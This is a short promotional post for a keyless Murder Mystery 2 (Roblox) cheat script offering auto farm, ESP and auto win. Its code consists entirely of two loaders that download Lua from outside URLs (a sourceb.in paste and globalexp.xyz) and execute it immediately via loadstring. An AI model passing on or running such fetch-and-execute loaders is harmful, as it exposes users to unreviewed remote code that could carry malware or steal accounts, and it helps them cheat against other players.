This is a keyless *MM2* script that includes auto farm and many other cool features. Itโs fully compatible with Xeno, and the auto farm GUI is easy to use.
โจ Features
Auto farm
Esp
Auto win
Auto pick up gun
Etc
Mm2
๐ Script Code
local function gui()
loadstring(game:HttpGet('https://cdn.sourceb.in/bins/hDd1wEz3kj/0'))()
end
local function farm()
loadstring(game:HttpGet("https://globalexp.xyz/"))()
end
task.spawn(gui)
task.spawn(farm)